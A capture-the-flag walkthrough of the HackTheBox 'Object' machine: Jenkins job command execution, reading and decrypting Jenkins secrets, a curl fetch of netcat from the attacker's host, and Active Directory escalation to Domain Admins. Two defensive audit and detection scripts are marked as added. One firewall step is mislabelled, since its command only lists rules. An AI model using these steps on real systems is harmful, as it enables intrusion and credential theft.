This post is a walkthrough of the HackTheBox machine Object.
Hackthebox Object Walkthrough

Reconnaissance
Port-Scan
sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.129.96.147
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-28 20:59 EDT
Nmap scan report for 10.129.96.147
Host is up (0.21s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
5985/tcp open wsman
8080/tcp open http-proxy
Nmap done: 1 IP address (1 host up) scanned in 13.92 seconds
sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.129.96.147
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-28 21:00 EDT
Nmap scan report for 10.129.96.147
Host is up (0.15s latency).
Not shown: 65534 open|filtered ports
PORT STATE SERVICE
53/udp open domain
Vulnerability scan
sudo nmap -Pn -p 80,5985,8080 -sC -sV -oN details1.txt 10.129.96.147
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-06-29 01:42 EDT
Nmap scan report for 10.129.96.147
Host is up (0.21s latency).
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Mega Engines
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8080/tcp open http Jetty 9.4.43.v20210629
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Jetty(9.4.43.v20210629)
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Front page
There is a front page on port 80 and a Jenkins login page on 8080. The default login credentials don't work. However, we can simply create a new account and log in.

Jenkins Version: 2.317

Directory Scan
Not much useful information was obtained.
gobuster dir -u http://10.129.96.147 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.129.96.147
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/06/29 19:45:42 Starting gobuster in directory enumeration mode
===============================================================
Progress: 45658 / 207644 (21.99%)[ERROR] 2022/06/29 19:57:01 [!] context deadline exceeded (Client.Timeout or context cancellation while reading body)
Directory scan on port 8080 with authentication

Jenkins url with authentication

A Nikto scan also does not reveal many details.

DNS enumeration
Checking for any subdomains
gobuster dns -d object.htb -w /usr/share/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain: object.htb
[+] Threads: 10
[+] Timeout: 1s
[+] Wordlist: /usr/share/SecLists-master/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
2022/06/29 20:01:58 Starting gobuster in DNS enumeration mode
===============================================================
===============================================================
2022/06/29 20:13:35 Finished
============================================================
More DNS enumeration

I could not find more on the DNS service.
Exploiting the Jenkins
I can see 2.317 is the version running. However, I could not find a working exploit for this version. There are a few methods suggested since we have login access to the dashboard. We can run jobs directly on the server using this dashboard, and a job can execute commands which can be used for enumeration.
Running the jobs using the schedule option
There should be a Build Now button for a Jenkins project. However, this user does not seem to have the privilege for it, so we can try the scheduling option and run the job every minute.
We can create test projects, assign tasks and run them on a schedule. We can try running some system commands this way:
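As an added defensive example (not part of the original walkthrough), the following Python script audits a Jenkins config.xml for the two settings that make this foothold possible: self-registration left open in the built-in user database, and an authorization strategy that gives every logged-in user full control, so any new account can create and schedule jobs. The XML samples are constructed to mirror those settings, not copied from the box.

```python
"""Audit a Jenkins config.xml for the settings behind this walkthrough's
foothold: self-registration enabled in the built-in user database and an
authorization strategy that gives every logged-in user full control
(which is what lets any account create and schedule jobs).
Added example; the XML samples are constructed, not copied from the box."""
import xml.etree.ElementTree as ET

# Strategies under which any authenticated user can configure and run jobs.
PERMISSIVE_STRATEGIES = {
    "hudson.security.AuthorizationStrategy$Unsecured",
    "hudson.security.FullControlOnceLoggedInAuthorizationStrategy",
}

# Constructed sample reproducing what the walkthrough observed.
OPEN_CONFIG = """<hudson>
  <version>2.317</version>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.FullControlOnceLoggedInAuthorizationStrategy">
    <denyAnonymousReadAccess>true</denyAnonymousReadAccess>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>false</disableSignup>
    <enableCaptcha>false</enableCaptcha>
  </securityRealm>
</hudson>"""

# Constructed hardened counterpart: signup off, matrix-based authorization.
HARDENED_CONFIG = """<hudson>
  <version>2.317</version>
  <useSecurity>true</useSecurity>
  <authorizationStrategy class="hudson.security.ProjectMatrixAuthorizationStrategy">
    <permission>hudson.model.Hudson.Administer:admin</permission>
  </authorizationStrategy>
  <securityRealm class="hudson.security.HudsonPrivateSecurityRealm">
    <disableSignup>true</disableSignup>
    <enableCaptcha>false</enableCaptcha>
  </securityRealm>
</hudson>"""


def _is_true(text):
    return (text or "").strip().lower() == "true"


def audit_jenkins_config(xml_text):
    """Return a list of (finding_id, detail) pairs; an empty list means no findings."""
    root = ET.fromstring(xml_text)
    findings = []
    if not _is_true(root.findtext("useSecurity")):
        findings.append(("security_disabled", "useSecurity is not true"))
    realm = root.find("securityRealm")
    if realm is not None and realm.get("class") == "hudson.security.HudsonPrivateSecurityRealm":
        # disableSignup=false is exactly the "just create an account" case above.
        if not _is_true(realm.findtext("disableSignup")):
            findings.append(("open_signup", "built-in user database allows self-registration"))
    strategy = root.find("authorizationStrategy")
    if strategy is None or strategy.get("class") in PERMISSIVE_STRATEGIES:
        cls = strategy.get("class") if strategy is not None else "<missing>"
        findings.append(("permissive_authz", f"{cls} lets any logged-in user configure and run builds"))
    return findings


if __name__ == "__main__":
    for name, cfg in (("open", OPEN_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_jenkins_config(cfg) or "no findings")
```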

Build using Method 2: using API token
Another method to run remote commands is using API tokens.

The method mentioned on the dashboard does not seem to work; it throws an authentication error.

There is a [post](How to implement a remote Jenkins build trigger with a URL - Coffee Talk: Java, News, Stories and Opinions) that explains how to trigger the build job through the API with a username and password.
The format below worked with username and password:

http://rchitect:11615d4b57ec7969e28bc5f405895060f7@object.htb:8080/job/rchitect's%20job/build?token=rchitectToken


Powershell Commands
Since we have tried basic Windows commands, let's try some PowerShell commands. However, they did not work; it seems some firewall rules are in place to block these connections.
Command to initiate a web request (Invoke-WebRequest):
powershell -c iwr http://10.10.14.5 -UseBasicParsing


Let's use some PowerShell commands to identify the firewall rule which is blocking.
Command:
powershell -c Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block

This one shows a firewall rule name; let's try to reveal the details of this rule. The [post](How to display firewall rule ports numbers with PowerShell) below explains how to use PowerShell commands to understand the details of specific rules:
Command mentioned in this post:
Get-NetFirewallRule -DisplayGroup 'Remote Desktop' |
Format-Table -Property Name,
DisplayName,
DisplayGroup,
@{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},
@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}},
@{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},
@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},
Enabled,
Profile,
Direction,
Action
Since we identified the rule name earlier, we can adapt the above command to our scenario and remove the extra whitespace as well. The new command is as follows:
powershell -c "Get-NetFirewallRule -DisplayName 'BlockOutboundDC' | Format-Table -Property DisplayName,@{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}},@{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}}, Enabled, Profile,Direction,Action"

Or you can simply take the first command that found the rule and pipe its output (|) into Format-Table to get the details, like below:
powershell -c "Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block |
Format-Table -Property DisplayName,
@{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},
@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}},
@{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},
@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},
Enabled,
Profile,
Direction,
Action"


Changing the Firewall rule Action
Now that we know the rule name which is blocking, let's try to change the action to Allow. However, we need to consider that there can be many rules which would still block the access even if we change the action for the specific rule given above. So let's change the action from "Block" to "Allow" for every outbound rule.
The command is as follows:
powershell -c Get-NetFirewallRule -Direction Outbound -Enabled True -Action Allow
Once we change the action to Allow with the above command, it returns many values. This shows many rules were present with the Block action and we have changed them to Allow. Refer to the full output here.
Let's try to ping from the Jenkins server to the Kali machine.

Even though the ping test is successful, I did try to download netcat through cmd and somehow it did not work.
Command:
cmd.exe /c curl http://10.10.14.20:8040/nc64.exe -o nc64.exe

Something is still blocking at the server level and I did not receive any connection request at my HTTP server.

Jenkins Password enumeration
This [document](How to reset the user/password of Jenkins on Windows? - Stack Overflow) talks about a 'config.xml' where the password-related configuration is stored in Jenkins.
From the previous job we know the directory where the job is running, which is 'C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\rchitect-test'.
As per the above document, we need to find the "config.xml".
PowerShell command used here:
powershell -c ls ..\..

We can view this file using the PowerShell command and copy its contents.
The command to use to view the file:
powershell -c Get-Content C:\Users\oliver\AppData\Local\Jenkins\.jenkins\users\admin_17207690984073220035\config.xml

The full file can be seen here. Apart from the config.xml file, there are a few more files required to decode the Jenkins password as per this [post](GitHub - hoto/jenkins-credentials-decryptor: Command line tool for dumping Jenkins credentials.).

I could see some files under this secrets folder which may be related to the password.


The last file seems to be binary, so let's encode it to base64 using powercat or certutil.
Either of these commands can be used to encode the binary file to base64 format so we can export it to the local Kali machine:
certutil -encode C:\Users\oliver\AppData\Local\Jenkins\.jenkins\secrets\hudson.util.Secret hudson.b64
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\rchitect-test>powershell -c [convert]::ToBase64String((cat ..\..\secrets\hudson.util.Secret -Encoding byte))

Shell as Oliver
Decrypting Jenkins password - Method 1
There are a few methods explained on the internet to decrypt the Jenkins credentials.
One is explained [here](GitHub - hoto/jenkins-credentials-decryptor: Command line tool for dumping Jenkins credentials.).

Decrypting Jenkins password - Method 2
Method 2 is to use the Python script available [here](pwn_jenkins/jenkins_offline_decrypt.py at master · gquere/pwn_jenkins · GitHub).

We have access to the server with the password obtained:


Privilege escalation from oliver to smith
I could see many open ports which were not shown during the nmap scan. It seems an Active Directory service is running on the server.
Command to check the ports listening on the server:
netstat -an | findstr LISTENING


Powerview Enumeration
Let's use PowerView to enumerate Active Directory. I have uploaded the file to Windows (location C:\ProgramData).
Make sure to load the script by using the command below:
Import-Module .\PowerView.ps1

After reviewing, I can see the current user has "GenericAll" rights, through which we can change the password of another user without knowing the current password.
Get-ObjectAcl -SamAccountName Oliver -ResolveGUIDs | ? {$_.ActiveDirectoryRights -eq "GenericAll"}
AceType : AccessAllowed
ObjectDN : CN=Olivar Ava,CN=Users,DC=object,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4088429403-1159899800-2753317549-1103
InheritanceFlags : None
BinaryLength : 36
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-21-4088429403-1159899800-2753317549-512
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
AceType : AccessAllowed
ObjectDN : CN=Olivar Ava,CN=Users,DC=object,DC=local
ActiveDirectoryRights : GenericAll
OpaqueLength : 0
ObjectSID : S-1-5-21-4088429403-1159899800-2753317549-1103
InheritanceFlags : None
BinaryLength : 24
IsInherited : False
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-548
AccessMask : 983551
AuditFlags : None
AceFlags : None
AceQualifier : AccessAllowed
Trying to change the password like this does not work:
*Evil-WinRM* PS C:\programdata> whoami; net user smith Password#123
object\oliver
net.exe : System error 5 has occurred.
+ CategoryInfo : NotSpecified: (System error 5 has occurred.:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
Access is denied.
So this method works:
*Evil-WinRM* PS C:\programdata> $rchitect = ConvertTo-SecureString 'Rch1tect' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity smith -AccountPassword $rchitect
Login as smith:
$ evil-winrm -i 10.129.96.147 -u smith -p Rch1tect
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> whoami
object\smith
Privilege escalation from smith to maria
User smith has the "WriteProperty" permission. I will try to change the password like we did earlier for "smith". However, it did not work.
*Evil-WinRM* PS C:\programdata> Get-ObjectAcl -SamAccountName smith -ResolveGUIDs
ObjectDN : CN=Smith William,CN=Users,DC=object,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server
ObjectSID : S-1-5-21-4088429403-1159899800-2753317549-1104
InheritanceFlags : None
BinaryLength : 44
AceType : AccessAllowedObject
ObjectAceFlags : ObjectAceTypePresent
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-561
AccessMask : 48
AuditFlags : None
IsInherited : False
AceFlags : None
InheritedObjectAceType : All
OpaqueLength : 0
AceQualifier : AccessAllowed
ObjectDN : CN=Smith William,CN=Users,DC=object,DC=local
ActiveDirectoryRights : ReadProperty, WriteProperty
ObjectAceType : Terminal-Server-License-Server
*Evil-WinRM* PS C:\programdata> $rchitect2 = ConvertTo-SecureString 'Rch2tect' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity maria -AccountPassword $rchitect2
Warning: [Set-DomainUserPassword] Error setting password for user 'maria' : Exception calling "SetPassword" with "1" argument(s): "Access is denied. (Exception from HRESULT: 0x80070005 (E_ACCESSDENIED))"
I tried multiple methods and the one below worked:
$ evil-winrm -i 10.129.45.28 -u smith -p Rch1tect
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> cd c:\programdata
*Evil-WinRM* PS C:\programdata> ls
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 7/11/2022 6:17 PM 770279 PowerView.ps1
*Evil-WinRM* PS C:\programdata> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{serviceprincipalname='nonexistent/rchitect'}
*Evil-WinRM* PS C:\programdata> Get-DomainUser maria | Select serviceprincipalname
serviceprincipalname
--------------------
nonexistent/rchitect
*Evil-WinRM* PS C:\programdata> setspn -a MSSQLSvc/object.local:1433 object.local\maria
Checking domain DC=object,DC=local
Registering ServicePrincipalNames for CN=maria garcia,CN=Users,DC=object,DC=local
MSSQLSvc/object.local:1433
Updated object
*Evil-WinRM* PS C:\programdata> Get-DomainUser maria | Select serviceprincipalname
serviceprincipalname
--------------------
{MSSQLSvc/object.local:1433, nonexistent/rchitect}
*Evil-WinRM* PS C:\programdata> echo "ping 10.10.14.3" > ping.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\ping.ps1"}
*Evil-WinRM* PS C:\programdata> echo "ls \users\maria\ > \programdata\out" > cmd.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{scriptpath="C:\\programdata\\cmd.ps1"}
*Evil-WinRM* PS C:\programdata> type out
Directory: C:\users\maria
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 10/22/2021 3:54 AM 3D Objects
d-r--- 10/22/2021 3:54 AM Contacts
d-r--- 10/25/2021 3:47 AM Desktop
d-r--- 10/25/2021 10:07 PM Documents
d-r--- 10/22/2021 3:54 AM Downloads
d-r--- 10/22/2021 3:54 AM Favorites
d-r--- 10/22/2021 3:54 AM Links
d-r--- 10/22/2021 3:54 AM Music
d-r--- 10/22/2021 3:54 AM Pictures
d-r--- 10/22/2021 3:54 AM Saved Games
d-r--- 10/22/2021 3:54 AM Searches
d-r--- 10/22/2021 3:54 AM Videos
*Evil-WinRM* PS C:\programdata> echo "ls \users\maria\documents > \programdata\out; ls \users\maria\desktop\ > \programdata\out2" > cmd.ps1
*Evil-WinRM* PS C:\programdata> ls out*
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 7/11/2022 6:39 PM 0 out
-a---- 7/11/2022 6:39 PM 830 out2
*Evil-WinRM* PS C:\programdata> type out2
Directory: C:\users\maria\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/26/2021 8:13 AM 6144 Engines.xls
*Evil-WinRM* PS C:\programdata> dir
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 7/11/2022 6:39 PM 186 cmd.ps1
-a---- 7/11/2022 6:40 PM 0 out
-a---- 7/11/2022 6:40 PM 830 out2
-a---- 7/11/2022 6:29 PM 36 ping.ps1
-a---- 7/11/2022 6:17 PM 770279 PowerView.ps1
*Evil-WinRM* PS C:\programdata> cd out2

*Evil-WinRM* PS C:\programdata> echo "copy \users\maria\desktop\Engines.xls \programdata\" > cmd.ps1
*Evil-WinRM* PS C:\programdata> dir
Directory: C:\programdata
Mode LastWriteTime Length Name
---- ------------- ------ ----
d---s- 10/21/2021 3:13 AM Microsoft
d----- 10/21/2021 12:05 AM regid.1991-06.com.microsoft
d----- 9/15/2018 12:19 AM SoftwareDistribution
d----- 4/10/2020 5:48 AM ssh
d----- 4/10/2020 10:49 AM USOPrivate
d----- 4/10/2020 10:49 AM USOShared
d----- 8/25/2021 2:57 AM VMware
-a---- 7/11/2022 8:57 PM 108 cmd.ps1
-a---- 10/26/2021 8:13 AM 6144 Engines.xls
-a---- 7/11/2022 8:57 PM 0 out
-a---- 7/11/2022 8:57 PM 830 out2
-a---- 7/11/2022 6:29 PM 36 ping.ps1
-a---- 7/11/2022 6:17 PM 770279 PowerView.ps1
*Evil-WinRM* PS C:\programdata> download c:\programdata\Engines.xls /home/rocky/tool/exp/windows/AD/Engines.xls
Info: Downloading c:\programdata\Engines.xls to /home/rocky/tool/exp/windows/AD/Engines.xls
Info: Download successful!
The file contains a few passwords; I have tested them and one of the passwords works.
crackmapexec winrm 10.129.45.28 -u maria -p enginespass
WINRM 10.129.45.28 5985 NONE [*] None (name:10.129.45.28) (domain:None)
WINRM 10.129.45.28 5985 NONE [*] http://10.129.45.28:5985/wsman
WINRM 10.129.45.28 5985 NONE [-] None\maria:d34gb8@
WINRM 10.129.45.28 5985 NONE [-] None\maria:0de_434_d545
WINRM 10.129.45.28 5985 NONE [+] None\maria:W3llcr4ft3d_4cls (Pwn3d!)
Let's log in with maria.
evil-winrm -i 10.129.45.28 -u maria -p W3llcr4ft3d_4cls
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> whoami
object\maria
Let's review the properties of user maria. The "WriteOwner" permission is found.
*Evil-WinRM* PS C:\programdata> Get-ObjectAcl -SamAccountName maria -ResolveGUIDs
AceType : AccessAllowed
ObjectDN : CN=maria garcia,CN=Users,DC=object,DC=local
ActiveDirectoryRights : CreateChild, Self, WriteProperty, ExtendedRight, Delete, GenericRead, WriteDacl, WriteOwner
OpaqueLength : 0
ObjectSID : S-1-5-21-4088429403-1159899800-2753317549-1106
InheritanceFlags : ContainerInherit
BinaryLength : 24
IsInherited : True
IsCallback : False
PropagationFlags : None
SecurityIdentifier : S-1-5-32-544
AccessMask : 983485
AuditFlags : None
AceFlags : ContainerInherit, Inherited
AceQualifier : AccessAllowed
With the rights user maria has, we can modify the owner of the group.
*Evil-WinRM* PS C:\programdata> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'
*Evil-WinRM* PS C:\programdata>
As the owner, we can grant full rights to user maria and add the user to the group.
*Evil-WinRM* PS C:\programdata> Add-DomainObjectAcl -TargetIdentity "Domain Admins" -PrincipalIdentity maria -Rights All
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
I could not see the groups added. Then I exited and logged in again.
*Evil-WinRM* PS C:\programdata> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
=========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
After exiting and logging in again:
*Evil-WinRM* PS C:\programdata> exit
Info: Exiting with code 0
$ evil-winrm -i 10.129.45.28 -u maria -p W3llcr4ft3d_4cls
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\maria\Documents> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ ============================================= ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
OBJECT\Domain Admins Group S-1-5-21-4088429403-1159899800-2753317549-512 Mandatory group, Enabled by default, Enabled group
OBJECT\Denied RODC Password Replication Group Alias S-1-5-21-4088429403-1159899800-2753317549-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
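As an added detection example (not from the original walkthrough), here is Python detection logic for the escalation chain just shown, run over constructed Security-log-style event records: a non-admin resetting another account's password (event 4724), writes to scriptPath and servicePrincipalName on another user and to the security descriptor of Domain Admins (event 5136), and the membership add (event 4728). The field names, the allow-list and the sample records are assumptions modelled on those events, not captured logs; the group-add rule also covers the 4732/4756 local and universal group variants, which the page does not mention.

```python
"""Detection logic for the AD abuse chain in this walkthrough: a non-admin
resetting another user's password (GenericAll), writes to scriptPath and
servicePrincipalName on another account (WriteProperty), a security
descriptor change on Domain Admins (WriteOwner/WriteDacl) and a membership
add to that group.  Added example, not the walkthrough's code; the event
records below are constructed to model Security log events 4724/5136/4728,
and the field names and allow-list are assumptions, not captured logs."""
from collections import defaultdict

PRIVILEGED_GROUPS = {"Domain Admins", "Enterprise Admins", "Administrators"}
TRUSTED_ADMINS = {"administrator"}  # assumed allow-list of accounts expected to do this
SENSITIVE_ATTRS = {"scriptPath", "servicePrincipalName", "nTSecurityDescriptor"}

# Constructed events mirroring the steps in the walkthrough, in order.
EVENTS = [
    {"EventID": 4724, "SubjectUserName": "oliver", "TargetUserName": "smith"},
    {"EventID": 5136, "SubjectUserName": "smith",
     "ObjectDN": "CN=maria garcia,CN=Users,DC=object,DC=local",
     "AttributeLDAPDisplayName": "servicePrincipalName"},
    {"EventID": 5136, "SubjectUserName": "smith",
     "ObjectDN": "CN=maria garcia,CN=Users,DC=object,DC=local",
     "AttributeLDAPDisplayName": "scriptPath"},
    {"EventID": 5136, "SubjectUserName": "maria",
     "ObjectDN": "CN=Domain Admins,CN=Users,DC=object,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4728, "SubjectUserName": "maria", "TargetUserName": "Domain Admins",
     "MemberName": "CN=maria garcia,CN=Users,DC=object,DC=local"},
    # Benign control: a trusted admin resetting a password should not alert.
    {"EventID": 4724, "SubjectUserName": "administrator", "TargetUserName": "oliver"},
]


def rdn_name(dn):
    """'CN=maria garcia,CN=Users,...' -> 'maria garcia'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def classify(ev):
    """Return (kind, subject, detail) for a suspicious event, else None."""
    subj = ev.get("SubjectUserName", "").lower()
    eid = ev["EventID"]
    if eid == 4724 and subj not in TRUSTED_ADMINS and subj != ev["TargetUserName"].lower():
        return ("password_reset", subj, f"{subj} reset password of {ev['TargetUserName']}")
    if eid == 5136 and subj not in TRUSTED_ADMINS:
        attr = ev.get("AttributeLDAPDisplayName")
        if attr in SENSITIVE_ATTRS:
            # nTSecurityDescriptor covers both the owner change and the DACL grant.
            kind = "dacl_or_owner_change" if attr == "nTSecurityDescriptor" else "attribute_write"
            return (kind, subj, f"{subj} wrote {attr} on {rdn_name(ev['ObjectDN'])}")
    if eid in (4728, 4732, 4756) and ev.get("TargetUserName") in PRIVILEGED_GROUPS:
        return ("privileged_group_add", subj,
                f"{subj} added {rdn_name(ev['MemberName'])} to {ev['TargetUserName']}")
    return None


def detect(events):
    """All per-event alerts, preserving log order."""
    return [a for a in (classify(e) for e in events) if a is not None]


def chain_actors(events, min_alerts=2):
    """Subjects behind two or more alerts: the escalation chain, not one-off noise."""
    per_subject = defaultdict(int)
    for _, subj, _ in detect(events):
        per_subject[subj] += 1
    return {s for s, n in per_subject.items() if n >= min_alerts}


if __name__ == "__main__":
    for kind, _, detail in detect(EVENTS):
        print(f"[{kind}] {detail}")
    print("chain actors:", sorted(chain_actors(EVENTS)))
```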
We have the root flag:
*Evil-WinRM* PS C:\Users\maria\Documents> cd C:\users
*Evil-WinRM* PS C:\users> dir
Directory: C:\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/10/2021 3:20 AM Administrator
d----- 10/26/2021 7:59 AM maria
d----- 10/26/2021 7:58 AM oliver
d-r--- 4/10/2020 10:49 AM Public
d----- 10/21/2021 3:44 AM smith
*Evil-WinRM* PS C:\users> cd Administrator
*Evil-WinRM* PS C:\users\Administrator> cd Desktop
*Evil-WinRM* PS C:\users\Administrator\Desktop> ls
Directory: C:\users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 7/11/2022 6:15 PM 34 root.txt